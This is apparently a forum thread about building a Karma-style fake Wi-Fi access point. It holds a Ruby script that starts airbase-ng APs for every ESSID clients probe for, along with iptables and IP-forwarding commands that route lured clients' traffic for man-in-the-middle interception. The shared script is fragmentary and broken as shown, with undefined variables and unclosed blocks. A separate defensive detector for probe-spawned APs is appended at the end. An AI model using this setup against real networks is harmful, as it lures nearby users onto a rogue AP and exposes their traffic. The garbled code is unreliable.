
Fake AP script... not like karma? It's airbase-ng


Karma was trouble to install on my machine, and I didn't feel like booting BT... so here is a fake AP script... it will capture clients' probe requests and start a new ESSID...

# start airodump-ng wlan0 -w airbase
# this will simply scan the airbase.csv file for client probes

@pid_list=[] # this will hold the list of running ESSIDs, "netgear", "freewifi", "cisco"
def refresh_list # read an airodump.csv file and sort through clients
	block_1=block[146..cut] # here is your list of access points...
	block_2=block[cut+90..-1] # here is your list of clients

	block_2.each_line{|x| buff<< x.split(",")[5..-1]}
		if not x==nil

			if not y.include?(":")
				if not y.include?("(not associated)")
						if z.size>=1
							if not @pid_list.include?(z)
							Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")}


while true
	sleep 10



Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives.

Laptop has 2 wifi devices. Wlan1 is connected to Droid 4G.

Wlan0 will be airbase-ng, so should I set ifconfig at0 up? Also, how would you configure DHCP?


I had to boot up Kali to get a working example of a fake AP with dnsmasq...

Simply follow this tutorial: http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html

And don't forget to add iptables to complete your clients' internet connection.

wlan1 has established a connection to my Droid hotspot 4G network... at0 traffic will now pass through

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

Edited by i8igmac

  • 2 weeks later...

Cool script, but have you seen airbase-ng's -P option? My understanding is that it would do much the same thing.

From the web page (http://www.aircrack-ng.org/doku.php?id=airbase-ng):

-P All Probes: This causes the fake access point to respond to all probes regardless of the ESSIDs specified. Without -P, the old behavior of ignoring probes for non-matching ESSIDs will be used.


-C Seconds: The -P option must also be specified in order to use this option. The wildcard ESSIDs will also be beaconed this number of seconds. A good typical value to use is "-C 60".
When running in the default mode (no ESSIDs) or with the -P parameter, the -C option can be used to enable beacon broadcasting of the ESSIDs seen by the directed probes. This allows one client which is probing for a network to result in a beacon for the same network for a brief period of time (the -C parameter, which is the number of seconds to broadcast new probe requests). This works well when some clients are sending directed probes, while others listen passively for beacons. A client which does directed probes results in a beacon which wakes up the passive client and causes the passive client to join the network as well. This is especially useful with Vista clients (which listen passively for beacons in many cases) which share the same WiFi network as Linux/Mac OS X clients which send directed probes.

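Seen from the monitoring side, the behaviour discussed in this thread (an AP that appears for an ESSID only after a client has probed for it) leaves a trace in the same airodump-ng CSV the script reads. The following is an added example, not code from any post in the thread: it flags such APs in a capture. The function names, the sample data and the heuristic itself (open network, probed ESSID, first seen after the probing client) are assumptions made for illustration.

```ruby
# Constructed sample in airodump-ng CSV layout (not a real capture).
SAMPLE_CSV = <<~CSV
  BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
  00:11:22:33:44:55, 2013-08-01 12:00:00, 2013-08-01 12:10:00, 6, 54, WPA2, CCMP, PSK, -40, 500, 0, 0.0.0.0, 8, corp-lan,
  00:11:22:33:44:66, 2013-08-01 11:00:00, 2013-08-01 12:10:00, 1, 54, OPN, , , -60, 900, 0, 0.0.0.0, 4, cafe,
  02:AA:BB:CC:DD:01, 2013-08-01 12:05:30, 2013-08-01 12:10:00, 6, 54, OPN, , , -30, 80, 0, 0.0.0.0, 8, freewifi,
  02:AA:BB:CC:DD:02, 2013-08-01 12:06:10, 2013-08-01 12:10:00, 6, 54, OPN, , , -30, 75, 0, 0.0.0.0, 7, netgear,

  Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
  AA:BB:CC:00:00:01, 2013-08-01 12:05:00, 2013-08-01 12:09:00, -50, 20, (not associated), freewifi,cafe,corp-lan
  AA:BB:CC:00:00:02, 2013-08-01 12:06:00, 2013-08-01 12:09:00, -55, 12, 00:11:22:33:44:55, netgear
CSV

# Split the capture into AP and station rows. Fields are unquoted, so an
# ESSID containing a comma is not handled here.
def parse_airodump(text)
  aps, stations, section = [], [], nil
  text.each_line do |line|
    f = line.strip.split(",").map(&:strip)
    next if f.empty?
    if f[0] == "BSSID" then section = :ap
    elsif f[0] == "Station MAC" then section = :sta
    elsif section == :ap && f.size >= 14
      aps << { bssid: f[0], first_seen: f[1], privacy: f[5], essid: f[13] }
    elsif section == :sta && f.size >= 6
      stations << { mac: f[0], first_seen: f[1], probes: (f[6..-1] || []).reject(&:empty?) }
    end
  end
  [aps, stations]
end

# Heuristic (assumed, not from the thread): an open AP whose ESSID some client
# probed for, and which first appeared after that client was first seen.
def probe_spawned_aps(aps, stations)
  first_probe = {}
  stations.each do |s|
    s[:probes].each do |e|
      first_probe[e] = s[:first_seen] if first_probe[e].nil? || s[:first_seen] < first_probe[e]
    end
  end
  # Timestamps are fixed-width "YYYY-MM-DD HH:MM:SS", so string order is time order.
  aps.select do |ap|
    t = first_probe[ap[:essid]]
    t && ap[:privacy] == "OPN" && ap[:first_seen] > t
  end
end

aps, stations = parse_airodump(SAMPLE_CSV)
probe_spawned_aps(aps, stations).each { |ap| puts "suspect: #{ap[:essid]} from #{ap[:bssid]}" }
```

A legitimate open AP that happens to power on late will also match, so treat hits as leads to check against an inventory of known BSSIDs rather than as confirmed rogue APs.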